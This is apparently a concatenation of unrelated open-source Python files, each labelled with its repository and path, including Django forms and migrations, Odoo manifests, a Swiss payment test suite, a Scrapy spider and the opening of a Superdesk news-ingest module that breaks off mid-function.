#CACHE_MIDDLEWARE_SECONDS = 10000
#CACHE_MIDDLEWARE_KEY_PREFIX = 'cittadelcapo'
#CACHE_MIDDLEWARE_ANONYMOUS_ONLY = True
|
UWCS/uwcs-website
|
uwcs_website/rest.py
|
from django_restapi.model_resource import Collection
from django_restapi.responder import XMLResponder
from django_restapi.resource import Resource
from django_restapi.authentication import *
from django.contrib.auth.models import User
from django.shortcuts import render_to_response,get_object_or_404
from uwcs_website.games.models import Game
#class UserEntry(Resource):
# def read(self, request, user_id):
# context = {'friendship':get_object_or_404(}
# return render_to_response('xml/user.xml', context)
xml_user = Collection(
queryset = User.objects.all(),
permitted_methods = ('GET',),
expose_fields = ('first_name','last_name','is_staff'),
responder = XMLResponder(),
authentication = HttpBasicAuthentication()
)
xml_games = Collection(
queryset = Game.objects.all(),
permitted_methods = ('GET',),
responder = XMLResponder(),
)
|
OpenPymeMx/account-financial-tools
|
account_tax_analysis/__openerp__.py
|
# -*- coding: utf-8 -*-
##############################################################################
#
# Author Vincent Renaville. Copyright 2013 Camptocamp SA
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
{"name": "Tax analysis",
"version": "8.0.1.0.0",
"depends": ["base", "account"],
"author": "Camptocamp SA,Odoo Community Association (OCA)",
"category": 'Accounting & Finance',
"website": "http://www.camptocamp.com",
"license": "AGPL-3",
"data": ["account_tax_analysis_view.xml"],
'installable': False,
"active": False,
}
|
BirkbeckCTP/janeway
|
src/core/homepage_elements/about/forms.py
|
from django import forms
from utils import setting_handler
from core.homepage_elements.about import plugin_settings
class AboutForm(forms.Form):
title = forms.CharField(
help_text='The title of the about block eg. "About this Journal"',
)
description = forms.CharField(
widget=forms.Textarea,
help_text='A general description of the journal.',
)
def save(self, journal, commit=True):
title = self.cleaned_data.get('title')
description = self.cleaned_data.get('description')
if commit:
setting_handler.save_plugin_setting(
plugin_settings.get_self(),
'about_title',
title,
journal,
)
setting_handler.save_setting(
'general',
'journal_description',
journal,
description,
)
|
edx/edx-enterprise
|
integrated_channels/cornerstone/migrations/0007_auto_20210708_1446.py
|
# Generated by Django 2.2.20 on 2021-07-08 14:46
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('cornerstone', '0006_auto_20191001_0742'),
]
operations = [
migrations.AlterField(
model_name='cornerstoneenterprisecustomerconfiguration',
name='catalogs_to_transmit',
field=models.TextField(blank=True, help_text='A comma-separated list of catalog UUIDs to transmit. If blank, all customer catalogs will be transmitted. If there are overlapping courses in the customer catalogs, the overlapping course metadata will be selected from the newest catalog.', null=True),
),
migrations.AlterField(
model_name='historicalcornerstoneenterprisecustomerconfiguration',
name='catalogs_to_transmit',
field=models.TextField(blank=True, help_text='A comma-separated list of catalog UUIDs to transmit. If blank, all customer catalogs will be transmitted. If there are overlapping courses in the customer catalogs, the overlapping course metadata will be selected from the newest catalog.', null=True),
),
]
|
RosesTheN00b/BudgetButlerWeb
|
butler_offline/viewcore/request_handler.py
|
'''
Created on 04.12.2017
@author: sebastian
'''
from flask import render_template
from flask import redirect
from requests.exceptions import ConnectionError
from butler_offline.viewcore.state import persisted_state
from butler_offline.viewcore import request_handler
from butler_offline.viewcore import viewcore
from butler_offline.viewcore.base_html import set_error_message
import random
DATABASE_VERSION = 0
SESSION_RANDOM = str(random.random())
REDIRECTOR = lambda x: redirect(x, code=301)
RENDER_FULL_FUNC = render_template
BASE_THEME_PATH = 'theme/'
REDIRECT_KEY = 'redirect_to'
def handle_request(request, request_action, html_base_page):
if request.method == 'POST' and 'ID' in request.values:
print('transactional request found')
if request.values['ID'] != current_key():
print('transaction rejected (requested:' + current_key() + ", got:" + request.values['ID'] + ')')
context = viewcore.generate_base_context('Fehler')
rendered_content = request_handler.RENDER_FULL_FUNC(theme('core/error_race.html'), **{})
context['content'] = rendered_content
return request_handler.RENDER_FULL_FUNC(theme('index.html'), **context)
print('transaction allowed')
request_handler.DATABASE_VERSION = request_handler.DATABASE_VERSION + 1
print('new db version: ' + str(request_handler.DATABASE_VERSION))
context = viewcore.generate_base_context('Fehler')
try:
context = request_action(request)
persisted_state.save_tainted()
except ConnectionError as err:
set_error_message(context, 'Verbindung zum Server konnte nicht aufgebaut werden.')
context['%Errortext'] = ''
except Exception as e:
set_error_message(context, 'Ein Fehler ist aufgetreten: \n ' + str(e))
print(e)
context['%Errortext'] = ''
if request.method == 'POST' and 'redirect' in request.values:
return request_handler.REDIRECTOR('/' + str(request.values['redirect']) + '/')
if '%Errortext' in context:
rendered_content = context['%Errortext']
elif REDIRECT_KEY in context:
return REDIRECTOR(context[REDIRECT_KEY])
else:
if 'special_page' in context:
html_base_page = context['special_page']
rendered_content = request_handler.RENDER_FULL_FUNC(theme(html_base_page), **context)
context['content'] = rendered_content
response = request_handler.RENDER_FULL_FUNC(theme('index.html'), **context)
return response
def create_redirect_context(url):
return {
REDIRECT_KEY: url
}
def theme(page):
return request_handler.BASE_THEME_PATH + page
def current_key():
return request_handler.SESSION_RANDOM + ' ' + persisted_state.database_instance().name + '_VERSION_' + str(request_handler.DATABASE_VERSION)
def stub_me():
request_handler.RENDER_FULL_FUNC = full_render_stub
request_handler.REDIRECTOR = lambda x: x
def stub_me_theme():
request_handler.RENDER_FULL_FUNC = full_render_stub_theme
request_handler.REDIRECTOR = lambda x: x
def full_render_stub(theme, **context):
return context
def full_render_stub_theme(theme, **context):
if not 'content' in context:
return theme
return context
|
datagutten/comics
|
comics/accounts/forms.py
|
# Based on https://bitbucket.org/jokull/django-email-login/
from django.contrib.auth import authenticate
from django.contrib.auth import forms as auth_forms
from django.contrib.auth.models import User
from django import forms
from django.utils.translation import ugettext_lazy as _
attrs_dict = {'class': 'required'}
class RegistrationForm(forms.Form):
email = forms.EmailField(
widget=forms.TextInput(attrs=dict(attrs_dict, maxlength=75)),
label=_("Email"))
password1 = forms.CharField(
widget=forms.PasswordInput(attrs=attrs_dict, render_value=False),
label=_("Password"))
password2 = forms.CharField(
widget=forms.PasswordInput(attrs=attrs_dict, render_value=False),
label=_("Password (again)"))
def clean(self):
"""
Verifiy that the values entered into the two password fields
match. Note that an error here will end up in
``non_field_errors()`` because it doesn't apply to a single
field.
"""
if ('password1' in self.cleaned_data
and 'password2' in self.cleaned_data):
if (self.cleaned_data['password1'] !=
self.cleaned_data['password2']):
raise forms.ValidationError(_(
"The two password fields didn't match."))
return self.cleaned_data
def clean_email(self):
"""
Validate that the supplied email address is unique for the
site.
"""
if User.objects.filter(email__iexact=self.cleaned_data['email']):
raise forms.ValidationError(_(
"This email address is already in use. "
"Please supply a different email address."))
return self.cleaned_data['email']
class AuthenticationForm(forms.Form):
"""
Base class for authenticating users. Extend this to get a form that accepts
username/password logins.
"""
email = forms.EmailField(label=_("Email"), max_length=75)
password = forms.CharField(label=_("Password"), widget=forms.PasswordInput)
def __init__(self, request=None, *args, **kwargs):
"""
If request is passed in, the form will validate that cookies are
enabled. Note that the request (a HttpRequest object) must have set a
cookie with the key TEST_COOKIE_NAME and value TEST_COOKIE_VALUE before
running this validation.
"""
self.request = request
self.user_cache = None
super(AuthenticationForm, self).__init__(*args, **kwargs)
def clean(self):
email = self.cleaned_data.get('email')
password = self.cleaned_data.get('password')
if email and password:
self.user_cache = authenticate(email=email, password=password)
if self.user_cache is None:
raise forms.ValidationError(_(
"Please enter a correct username and password. "
"Note that both fields are case-sensitive."))
elif not self.user_cache.is_active:
raise forms.ValidationError(_("This account is inactive."))
return self.cleaned_data
def get_user_id(self):
if self.user_cache:
return self.user_cache.id
return None
def get_user(self):
return self.user_cache
class PasswordResetForm(auth_forms.PasswordResetForm):
def __init__(self, *args, **kwargs):
auth_forms.PasswordResetForm.__init__(self, *args, **kwargs)
self.fields['email'].label = 'Email'
|
acsone/server-tools
|
auth_totp/__openerp__.py
|
# -*- coding: utf-8 -*-
# Copyright 2016-2017 LasLabs Inc.
# License LGPL-3.0 or later (http://www.gnu.org/licenses/lgpl.html).
{
'name': 'MFA Support',
'summary': 'Allows users to enable MFA and add optional trusted devices',
'version': '8.0.1.0.0',
'category': 'Extra Tools',
'website': 'https://laslabs.com/',
'author': 'LasLabs, Odoo Community Association (OCA)',
'license': 'LGPL-3',
'application': False,
'installable': True,
'external_dependencies': {
'python': ['pyotp'],
},
'depends': [
'report',
'web',
],
'data': [
'data/ir_config_parameter.xml',
'security/ir.model.access.csv',
'security/res_users_authenticator_security.xml',
'wizards/res_users_authenticator_create.xml',
'views/auth_totp.xml',
'views/res_users.xml',
],
}
|
agarsev/grafeno
|
grafeno/transformers/extend.py
|
from collections import deque
from nltk.corpus import wordnet as wn
from grafeno.transformers.wordnet import Transformer as WNGet
from grafeno.transformers.__utils import Transformer as Utils
class Transformer (WNGet, Utils):
'''Adds to the graph all WordNet hypernyms of every possible concept node.
The hypernyms are added as nodes with grammateme ``hyper = True'', and
related by edges with functor ``HYP''.
Parameters
----------
extend_min_depth : int
Minimum depth of hypernyms to add. This depth is defined as the shortest
path from the synset to the root of the WordNet hypernym hierarchy.
'''
def __init__ (self, extend_min_depth = 4, **kwds):
super().__init__(**kwds)
self.__min_depth = extend_min_depth
def post_process (self):
super().post_process()
g = self.graph
mind = self.__min_depth
# Extend with hypernyms
to_extend = deque(list(self.nodes))
while len(to_extend)>0:
n = to_extend.popleft()
node = self.nodes[n]
ss = node.get('synset')
if not ss:
continue
for cc in ss.hypernyms() + ss.instance_hypernyms():
depth = ss.min_depth()
if depth < mind:
continue
concept = cc.lemmas()[0].name()
nid = self.sprout(n,
{'functor':'HYP','weight':depth/(depth+1)},
{'concept':concept,'synset':cc,'hyper':True})
to_extend.append(nid)
|
teltek/edx-platform
|
lms/djangoapps/grades/api/urls.py
|
"""
Grades API URLs.
"""
from django.conf import settings
from django.conf.urls import include, url
from lms.djangoapps.grades.api import views
app_name = 'lms.djangoapps.grades'
urlpatterns = [
url(
r'^v0/course_grade/{course_id}/users/$'.format(
course_id=settings.COURSE_ID_PATTERN,
),
views.UserGradeView.as_view(), name='user_grade_detail'
),
url(
r'^v0/courses/{course_id}/policy/$'.format(
course_id=settings.COURSE_ID_PATTERN,
),
views.CourseGradingPolicy.as_view(), name='course_grading_policy'
),
url(r'^v1/', include('grades.api.v1.urls', namespace='v1'))
]
|
cloudbase/maas
|
src/maasserver/tests/test_sequence.py
|
# Copyright 2012, 2013 Canonical Ltd. This software is licensed under the
# GNU Affero General Public License version 3 (see the file LICENSE).
"""Test :class:`Sequence`."""
from __future__ import (
absolute_import,
print_function,
unicode_literals,
)
str = None
__metaclass__ = type
__all__ = []
import random
from django.db import connection
from django.db.utils import DatabaseError
from maasserver.sequence import Sequence
from maasserver.testing.factory import factory
from maasserver.testing.testcase import MAASServerTestCase
class TestSequence(MAASServerTestCase):
def query_seq(self, name):
cursor = connection.cursor()
cursor.execute(
"SELECT nextval(%s)", [name])
return cursor.fetchone()[0]
def test_create_sequence(self):
name = factory.make_name('seq', sep='')
seq = Sequence(name)
seq.create()
val = self.query_seq(seq.name)
self.assertEqual(1, val)
def test_sequence_respects_minvalue(self):
name = factory.make_name('seq', sep='')
minvalue = random.randint(1, 50)
seq = Sequence(name, minvalue=minvalue)
seq.create()
val = self.query_seq(seq.name)
self.assertEqual(minvalue, val)
def test_sequence_respects_incr(self):
name = factory.make_name('seq', sep='')
incr = random.randint(1, 50)
seq = Sequence(name, incr=incr)
seq.create()
val = self.query_seq(seq.name)
val = self.query_seq(seq.name)
self.assertEqual(1 + incr, val)
def test_sequence_respects_maxvalue_and_cycles(self):
name = factory.make_name('seq', sep='')
maxvalue = random.randint(10, 50)
seq = Sequence(name, maxvalue=maxvalue)
seq.create()
cursor = connection.cursor()
query = "ALTER SEQUENCE %s" % seq.name
cursor.execute(query + " RESTART WITH %s", [maxvalue])
val = self.query_seq(seq.name)
val = self.query_seq(seq.name)
self.assertEqual(1, val)
def test_drop_sequence(self):
name = factory.make_name('seq', sep='')
seq = Sequence(name)
seq.create()
seq.drop()
self.assertRaisesRegexp(
DatabaseError, "does not exist", self.query_seq,
seq.name)
def test_nextval_returns_sequential_values(self):
name = factory.make_name('seq', sep='')
seq = Sequence(name)
seq.create()
self.assertSequenceEqual(
range(1, 11), [seq.nextval() for i in range(10)])
|
HelloLily/hellolily
|
lily/messaging/email/migrations/0044_auto_20181106_1003.py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.15 on 2018-11-06 10:03
from __future__ import unicode_literals
import django.contrib.postgres.fields
import django.contrib.postgres.fields.jsonb
import django.core.validators
from django.db import migrations, models
import django.db.models.deletion
import lily.messaging.email.models.models
import re
class Migration(migrations.Migration):
dependencies = [
('tenant', '0008_auto_20180822_1308'),
('email', '0043_auto_20180906_1300'),
]
operations = [
migrations.CreateModel(
name='EmailDraft',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('to', django.contrib.postgres.fields.ArrayField(base_field=models.EmailField(max_length=254), size=None, verbose_name='to')),
('cc', django.contrib.postgres.fields.ArrayField(base_field=models.EmailField(max_length=254), size=None, verbose_name='cc')),
('bcc', django.contrib.postgres.fields.ArrayField(base_field=models.EmailField(max_length=254), size=None, verbose_name='bcc')),
('headers', django.contrib.postgres.fields.jsonb.JSONField(default=dict, verbose_name='email headers')),
('subject', models.CharField(blank=True, max_length=255, verbose_name='subject')),
('body', models.TextField(blank=True, verbose_name='html body')),
('mapped_attachments', models.IntegerField(verbose_name='number of mapped attachments')),
('original_attachment_ids', models.TextField(default=b'', validators=[django.core.validators.RegexValidator(re.compile('^\\d+(?:\\,\\d+)*\\Z'), code='invalid', message='Enter only digits separated by commas.')])),
('template_attachment_ids', models.CharField(default=b'', max_length=255, validators=[django.core.validators.RegexValidator(re.compile('^\\d+(?:\\,\\d+)*\\Z'), code='invalid', message='Enter only digits separated by commas.')])),
('original_message_id', models.CharField(blank=True, db_index=True, default=b'', max_length=50)),
('send_from', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='draft_messages', to='email.EmailAccount', verbose_name='from')),
('tenant', models.ForeignKey(blank=True, on_delete=django.db.models.deletion.CASCADE, to='tenant.Tenant')),
],
options={
'verbose_name': 'email draft message',
'verbose_name_plural': 'email draft messages',
},
),
migrations.CreateModel(
name='EmailDraftAttachment',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('inline', models.BooleanField(default=False)),
('attachment', models.FileField(max_length=255, upload_to=lily.messaging.email.models.models.get_outbox_attachment_upload_path)),
('size', models.PositiveIntegerField(default=0)),
('content_type', models.CharField(max_length=255, verbose_name='content type')),
('email_draft', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='attachments', to='email.EmailDraft')),
('tenant', models.ForeignKey(blank=True, on_delete=django.db.models.deletion.CASCADE, to='tenant.Tenant')),
],
options={
'verbose_name': 'email draft attachment',
'verbose_name_plural': 'email draft attachments',
},
),
migrations.AddField(
model_name='emailmessage',
name='received_by_bcc',
field=models.ManyToManyField(related_name='received_messages_as_bcc', to='email.Recipient'),
),
]
|
snoack/cocktail-search
|
crawler/cocktails/spiders/drinksmixer.py
|
import re
from scrapy.spiders import CrawlSpider, Rule
from scrapy.linkextractors import LinkExtractor
from scrapy.selector import HtmlXPathSelector
from lxml.cssselect import CSSSelector
from cocktails.items import CocktailItem
from cocktails.utils import html_to_text
xp_title = CSSSelector('.recipe_title').path
xp_ingredients = CSSSelector('.ingredient').path
class DrinksMixerSpider(CrawlSpider):
name = 'drinksmixer'
allowed_domains = ['www.drinksmixer.com']
start_urls = ['http://www.drinksmixer.com/']
rules = (
Rule(LinkExtractor(allow=r'/drink[^/]+.html$'), callback='parse_recipe'),
Rule(LinkExtractor(allow=r'/cat/')),
)
def parse_recipe(self, response):
hxs = HtmlXPathSelector(response)
for title in hxs.select(xp_title).extract():
break
else:
return []
ingredients = hxs.select(xp_ingredients).extract()
return [CocktailItem(
title=re.sub(r'\s+recipe$', '', html_to_text(title)),
picture=None,
url=response.url,
source='Drinks Mixer',
ingredients=[html_to_text(x) for x in ingredients],
)]
|
pelikanchik/edx-platform
|
docs/en_us/data/source/conf.py
|
# -*- coding: utf-8 -*-
#
import sys, os
on_rtd = os.environ.get('READTHEDOCS', None) == 'True'
sys.path.append(os.path.abspath('../../../../'))
sys.path.append(os.path.abspath('../../../'))
from docs.shared.conf import *
sys.path.insert(0, os.path.abspath('.'))
master_doc = 'index'
# Add any paths that contain templates here, relative to this directory.
templates_path.append('source/_templates')
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path.append('source/_static')
project = u'edX Data Documentation'
copyright = u'2013, edX Documentation Team'
# The short X.Y version.
version = ''
# The full version, including alpha/beta/rc tags.
release = ''
#Added to turn off smart quotes so users can copy JSON values without problems.
html_use_smartypants = False
|
CompassionCH/l10n-switzerland
|
l10n_ch_pain_credit_transfer/tests/test_ch_sct.py
|
# -*- coding: utf-8 -*-
# © 2016 Akretion (Alexis de Lattre <alexis.delattre@akretion.com>)
# License AGPL-3.0 or later (http://www.gnu.org/licenses/agpl).
from odoo.addons.account.tests.account_test_classes\
import AccountingTestCase
from odoo.tools import float_compare
import time
from lxml import etree
ch_iban = 'CH15 3881 5158 3845 3843 7'
class TestSCT_CH(AccountingTestCase):
def setUp(self):
super(TestSCT_CH, self).setUp()
Account = self.env['account.account']
Journal = self.env['account.journal']
PaymentMode = self.env['account.payment.mode']
self.payment_order_model = self.env['account.payment.order']
self.payment_line_model = self.env['account.payment.line']
self.bank_line_model = self.env['bank.payment.line']
self.partner_bank_model = self.env['res.partner.bank']
self.attachment_model = self.env['ir.attachment']
self.invoice_model = self.env['account.invoice']
self.invoice_line_model = self.env['account.invoice.line']
self.main_company = self.env.ref('base.main_company')
self.partner_agrolait = self.env.ref('base.res_partner_2')
self.account_expense = Account.search([(
'user_type_id',
'=',
self.env.ref('account.data_account_type_expenses').id)], limit=1)
self.account_payable = Account.search([(
'user_type_id',
'=',
self.env.ref('account.data_account_type_payable').id)], limit=1)
# Create a swiss bank
ch_bank1 = self.env['res.bank'].create({
'name': 'Alternative Bank Schweiz AG',
'bic': 'ALSWCH21XXX',
'clearing': '38815',
'ccp': '46-110-7',
})
# create a ch bank account for my company
self.cp_partner_bank = self.partner_bank_model.create({
'acc_number': ch_iban,
'partner_id': self.env.ref('base.main_partner').id,
})
self.cp_partner_bank.onchange_acc_number_set_swiss_bank()
# create journal
self.bank_journal = Journal.create({
'name': 'Company Bank journal',
'type': 'bank',
'code': 'BNKFB',
'bank_account_id': self.cp_partner_bank.id,
'bank_id': ch_bank1.id,
})
# create a payment mode
pay_method_id = self.env.ref(
'account_banking_sepa_credit_transfer.sepa_credit_transfer').id
self.payment_mode = PaymentMode.create({
'name': 'CH credit transfer',
'bank_account_link': 'fixed',
'fixed_journal_id': self.bank_journal.id,
'payment_method_id': pay_method_id,
})
self.payment_mode.payment_method_id.pain_version =\
'pain.001.001.03.ch.02'
self.chf_currency = self.env.ref('base.CHF')
self.eur_currency = self.env.ref('base.EUR')
self.main_company.currency_id = self.chf_currency.id
ch_bank2 = self.env['res.bank'].create({
'name': 'Banque Cantonale Vaudoise',
'bic': 'BCVLCH2LXXX',
'clearing': '767',
'ccp': '01-1234-1',
})
# Create a bank account with clearing 767
self.agrolait_partner_bank = self.partner_bank_model.create({
'acc_number': 'CH9100767000S00023455',
'partner_id': self.partner_agrolait.id,
'bank_id': ch_bank2.id,
'ccp': '01-1234-1',
})
def test_sct_ch_payment_type1(self):
invoice1 = self.create_invoice(
self.partner_agrolait.id,
self.agrolait_partner_bank.id, self.chf_currency, 42.0,
'bvr', '132000000000000000000000014')
invoice2 = self.create_invoice(
self.partner_agrolait.id,
self.agrolait_partner_bank.id, self.chf_currency, 12.0,
'bvr', '132000000000004')
for inv in [invoice1, invoice2]:
action = inv.create_account_payment_line()
self.assertEquals(action['res_model'], 'account.payment.order')
self.payment_order = self.payment_order_model.browse(action['res_id'])
self.assertEquals(
self.payment_order.payment_type, 'outbound')
self.assertEquals(
self.payment_order.payment_mode_id, self.payment_mode)
self.assertEquals(
self.payment_order.journal_id, self.bank_journal)
pay_lines = self.payment_line_model.search([
('partner_id', '=', self.partner_agrolait.id),
('order_id', '=', self.payment_order.id)])
self.assertEquals(len(pay_lines), 2)
agrolait_pay_line1 = pay_lines[0]
accpre = self.env['decimal.precision'].precision_get('Account')
self.assertEquals(agrolait_pay_line1.currency_id, self.chf_currency)
self.assertEquals(
agrolait_pay_line1.partner_bank_id, invoice1.partner_bank_id)
self.assertEquals(float_compare(
agrolait_pay_line1.amount_currency, 42, precision_digits=accpre),
0)
self.assertEquals(agrolait_pay_line1.communication_type, 'bvr')
self.assertEquals(
agrolait_pay_line1.communication,
'132000000000000000000000014')
self.payment_order.draft2open()
self.assertEquals(self.payment_order.state, 'open')
self.assertEquals(self.payment_order.sepa, False)
bank_lines = self.bank_line_model.search([
('partner_id', '=', self.partner_agrolait.id)])
self.assertEquals(len(bank_lines), 2)
for bank_line in bank_lines:
self.assertEquals(bank_line.currency_id, self.chf_currency)
self.assertEquals(bank_line.communication_type, 'bvr')
self.assertEquals(
bank_line.communication in [
'132000000000000000000000014',
'132000000000004'], True)
self.assertEquals(
bank_line.partner_bank_id, invoice1.partner_bank_id)
action = self.payment_order.open2generated()
self.assertEquals(self.payment_order.state, 'generated')
attachment = self.attachment_model.browse(action.get('attachment_id',
action['res_id']))
self.assertEquals(attachment.datas_fname[-4:], '.xml')
xml_file = attachment.datas.decode('base64')
xml_root = etree.fromstring(xml_file)
# print "xml_file=", etree.tostring(xml_root, pretty_print=True)
namespaces = xml_root.nsmap
namespaces['p'] = xml_root.nsmap[None]
namespaces.pop(None)
pay_method_xpath = xml_root.xpath(
'//p:PmtInf/p:PmtMtd', namespaces=namespaces)
self.assertEquals(
namespaces['p'],
'http://www.six-interbank-clearing.com/de/'
'pain.001.001.03.ch.02.xsd')
self.assertEquals(pay_method_xpath[0].text, 'TRF')
sepa_xpath = xml_root.xpath(
'//p:PmtInf/p:PmtTpInf/p:SvcLvl/p:Cd', namespaces=namespaces)
self.assertEquals(len(sepa_xpath), 0)
local_instrument_xpath = xml_root.xpath(
'//p:PmtInf/p:PmtTpInf/p:LclInstrm/p:Prtry', namespaces=namespaces)
self.assertEquals(local_instrument_xpath[0].text, 'CH01')
debtor_acc_xpath = xml_root.xpath(
'//p:PmtInf/p:DbtrAcct/p:Id/p:IBAN', namespaces=namespaces)
self.assertEquals(
debtor_acc_xpath[0].text,
self.payment_order.company_partner_bank_id.sanitized_acc_number)
self.payment_order.generated2uploaded()
self.assertEquals(self.payment_order.state, 'uploaded')
for inv in [invoice1, invoice2]:
self.assertEquals(inv.state, 'paid')
return
def test_sct_ch_payment_type3(self):
invoice1 = self.create_invoice(
self.partner_agrolait.id,
self.agrolait_partner_bank.id, self.eur_currency, 4042.0,
'none', 'Inv1242')
invoice2 = self.create_invoice(
self.partner_agrolait.id,
self.agrolait_partner_bank.id, self.eur_currency, 1012.55,
'none', 'Inv1248')
for inv in [invoice1, invoice2]:
action = inv.create_account_payment_line()
self.assertEquals(action['res_model'], 'account.payment.order')
self.payment_order = self.payment_order_model.browse(action['res_id'])
self.assertEquals(
self.payment_order.payment_type, 'outbound')
self.assertEquals(
self.payment_order.payment_mode_id, self.payment_mode)
self.assertEquals(
self.payment_order.journal_id, self.bank_journal)
pay_lines = self.payment_line_model.search([
('partner_id', '=', self.partner_agrolait.id),
('order_id', '=', self.payment_order.id)])
self.assertEquals(len(pay_lines), 2)
agrolait_pay_line1 = pay_lines[0]
accpre = self.env['decimal.precision'].precision_get('Account')
self.assertEquals(agrolait_pay_line1.currency_id, self.eur_currency)
self.assertEquals(
agrolait_pay_line1.partner_bank_id, invoice1.partner_bank_id)
self.assertEquals(float_compare(
agrolait_pay_line1.amount_currency, 4042.0,
precision_digits=accpre), 0)
self.assertEquals(agrolait_pay_line1.communication_type, 'normal')
self.assertEquals(
agrolait_pay_line1.communication, 'Inv1242')
self.payment_order.draft2open()
self.assertEquals(self.payment_order.state, 'open')
self.assertEquals(self.payment_order.sepa, False)
bank_lines = self.bank_line_model.search([
('partner_id', '=', self.partner_agrolait.id)])
self.assertEquals(len(bank_lines), 1)
bank_line = bank_lines[0]
self.assertEquals(bank_line.currency_id, self.eur_currency)
self.assertEquals(bank_line.communication_type, 'normal')
self.assertEquals(bank_line.communication, 'Inv1242-Inv1248')
self.assertEquals(
bank_line.partner_bank_id, invoice1.partner_bank_id)
action = self.payment_order.open2generated()
self.assertEquals(self.payment_order.state, 'generated')
attachment = self.attachment_model.browse(action.get('attachment_id',
action['res_id']))
self.assertEquals(attachment.datas_fname[-4:], '.xml')
xml_file = attachment.datas.decode('base64')
xml_root = etree.fromstring(xml_file)
# print "xml_file=", etree.tostring(xml_root, pretty_print=True)
namespaces = xml_root.nsmap
namespaces['p'] = xml_root.nsmap[None]
namespaces.pop(None)
pay_method_xpath = xml_root.xpath(
'//p:PmtInf/p:PmtMtd', namespaces=namespaces)
self.assertEquals(
namespaces['p'],
'http://www.six-interbank-clearing.com/de/'
'pain.001.001.03.ch.02.xsd')
self.assertEquals(pay_method_xpath[0].text, 'TRF')
sepa_xpath = xml_root.xpath(
'//p:PmtInf/p:PmtTpInf/p:SvcLvl/p:Cd', namespaces=namespaces)
self.assertEquals(len(sepa_xpath), 0)
local_instrument_xpath = xml_root.xpath(
'//p:PmtInf/p:PmtTpInf/p:LclInstrm/p:Prtry', namespaces=namespaces)
self.assertEquals(len(local_instrument_xpath), 0)
debtor_acc_xpath = xml_root.xpath(
'//p:PmtInf/p:DbtrAcct/p:Id/p:IBAN', namespaces=namespaces)
self.assertEquals(
debtor_acc_xpath[0].text,
self.payment_order.company_partner_bank_id.sanitized_acc_number)
self.payment_order.generated2uploaded()
self.assertEquals(self.payment_order.state, 'uploaded')
for inv in [invoice1, invoice2]:
self.assertEquals(inv.state, 'paid')
return
def create_invoice(
self, partner_id, partner_bank_id, currency, price_unit,
ref_type, ref, type='in_invoice'):
invoice = self.invoice_model.create({
'partner_id': partner_id,
'reference_type': ref_type,
'reference': ref,
'currency_id': currency.id,
'name': 'test',
'account_id': self.account_payable.id,
'type': type,
'date_invoice': time.strftime('%Y-%m-%d'),
'payment_mode_id': self.payment_mode.id,
'partner_bank_id': partner_bank_id,
})
self.invoice_line_model.create({
'invoice_id': invoice.id,
'price_unit': price_unit,
'quantity': 1,
'name': 'Great service',
'account_id': self.account_expense.id,
})
invoice.invoice_validate()
invoice.action_move_create()
return invoice
|
better-dem/portal
|
core/migrations/0011_auto_20161028_2250.py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.9.8 on 2016-10-28 22:50
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('core', '0010_auto_20161026_2148'),
]
operations = [
migrations.AddField(
model_name='participationitem',
name='tags',
field=models.ManyToManyField(to='core.Tag'),
),
migrations.AddField(
model_name='userprofile',
name='tags',
field=models.ManyToManyField(to='core.Tag'),
),
]
|
plamut/superdesk-core
|
superdesk/io/commands/update_ingest.py
|
# -*- coding: utf-8; -*-
#
# This file is part of Superdesk.
#
# Copyright 2013, 2014 Sourcefabric z.u. and contributors.
#
# For the full copyright and license information, please see the
# AUTHORS and LICENSE files distributed with this source code, or
# at https://www.sourcefabric.org/superdesk/license
import logging
import superdesk
from flask import current_app as app
from datetime import timedelta, timezone, datetime
from werkzeug.exceptions import HTTPException
from superdesk.notification import push_notification
from superdesk.activity import ACTIVITY_EVENT, notify_and_add_activity
from superdesk.io import providers
from superdesk.celery_app import celery
from superdesk.celery_task_utils import get_lock_id, get_host_id
from superdesk.utc import utcnow, get_expiry_date
from superdesk.workflow import set_default_state
from superdesk.errors import ProviderError
from superdesk.stats import stats
from superdesk.upload import url_for_media
from superdesk.media.media_operations import download_file_from_url, process_file
from superdesk.media.renditions import generate_renditions
from superdesk.io.iptc import subject_codes
from superdesk.metadata.item import GUID_NEWSML, GUID_FIELD, FAMILY_ID, ITEM_TYPE, CONTENT_TYPE
from superdesk.metadata.utils import generate_guid
from superdesk.lock import lock, unlock
UPDATE_SCHEDULE_DEFAULT = {'minutes': 5}
LAST_UPDATED = 'last_updated'
LAST_ITEM_UPDATE = 'last_item_update'
STATE_INGESTED = 'ingested'
IDLE_TIME_DEFAULT = {'hours': 0, 'minutes': 0}
logger = logging.getLogger(__name__)
superdesk.workflow_state(STATE_INGESTED)
superdesk.workflow_action(
name='ingest'
)
def is_valid_type(provider, provider_type_filter=None):
"""Test if given provider has valid type and should be updated.
:param provider: provider to be updated
:param provider_type_filter: active provider type filter
"""
provider_type = provider.get('type')
if provider_type not in providers:
return False
if provider_type_filter and provider_type != provider_type_filter:
return False
return True
def is_scheduled(provider):
"""Test if given provider should be scheduled for update.
:param provider: ingest provider
"""
now = utcnow()
last_updated = provider.get(LAST_UPDATED, now - timedelta(days=100)) # if never updated run now
update_schedule = provider.get('update_schedule', UPDATE_SCHEDULE_DEFAULT)
return last_updated + timedelta(**update_schedule) < now
def is_closed(provider):
"""Test if provider is closed.
:param provider: ingest provider
"""
return provider.get('is_closed', False)
def filter_expired_items(provider, items):
def is_not_expired(item):
if item.get('expiry') or item.get('versioncreated'):
